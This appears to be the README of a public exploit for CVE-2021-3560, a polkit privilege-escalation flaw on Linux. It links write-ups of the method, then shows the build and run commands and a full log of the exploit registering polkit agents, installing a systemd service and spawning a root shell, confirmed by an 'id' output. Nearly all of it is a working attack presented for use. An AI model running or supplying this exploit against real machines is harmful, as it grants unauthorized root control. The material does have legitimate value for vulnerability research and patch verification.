C implementation of the CVE-2021-3560 (polkit) exploit. Blog posts describing this exploitation method:
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation
Code by swing (@WinMin), Ricter Z (@RicterZ)
dev@server:/tmp/CVE-2021-3560$ make
dev@server:/tmp/CVE-2021-3560$ ./exploit
pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin
pid:264181 - [*] main process running ...
pid:264183 - [*] starting polkit authentication agent ...
pid:264182 - [*] starting polkit authentication agent ...
pid:264185 - [*] starting polkit authentication agent ...
pid:264183 - [*] trying to register authentication agent to polkit ...
pid:264182 - [*] trying to register authentication agent to polkit ...
pid:264183 - [+] polkit authentication agent registered successfully!
pid:264183 - [+] D-Bus message loop now running ..
pid:264185 - [*] trying to register authentication agent to polkit ...
pid:264182 - [+] polkit authentication agent registered successfully!
pid:264182 - [+] D-Bus message loop now running ..
pid:264185 - [+] polkit authentication agent registered successfully!
pid:264185 - [+] D-Bus message loop now running ..
pid:264183 - [*] trying to enable system unit file '/tmp/pwnkit.service' ...
pid:264182 - [*] trying to start systemd service 'pwnkit.service' ...
pid:264185 - [*] trying to reload systemd daemon ...
pid:264183 - [+] received authentication for action 'org.freedesktop.systemd1.manage-unit-files' ...
pid:264183 - [*] sending agent response with cookie: 61-bf243e2d0039ce513f32553f945c80d7-1-dddae4b0320b4030370585c13b6a9985
pid:264182 - [+] received authentication for action 'org.freedesktop.systemd1.manage-units' ...
pid:264182 - [*] sending agent response with cookie: 62-c23ffa64bf9c05a1ca8bf057d56a9dfd-1-8d220cfb275f861dcfacd340fc5a578a
pid:264185 - [+] received authentication for action 'org.freedesktop.systemd1.reload-daemon' ...
pid:264185 - [*] sending agent response with cookie: 63-3b99bb8ff0b6b3ffcb7e6103fbe86073-1-6d47c6a380691defd9c455eba617513d
pid:264181 - [+] file exists, popping root shell ...
pwned-5.0# id
uid=1000(dev) gid=1000(dev) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(dev)
pwned-5.0#